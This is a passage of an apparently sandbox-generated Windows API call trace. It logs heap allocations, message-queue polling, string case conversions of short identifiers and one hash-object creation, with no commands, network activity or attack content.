RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.039] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.039] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.039] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.040] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.040] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0266.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.040] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0266.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.041] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.041] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.042] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.042] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.042] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.042] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.042] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.043] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.043] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.044] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.044] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.044] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0266.044] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.044] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.045] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.045] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.045] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.045] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.045] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.045] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.045] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.045] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.046] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.048] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.048] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.049] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.049] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.050] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.050] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.050] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 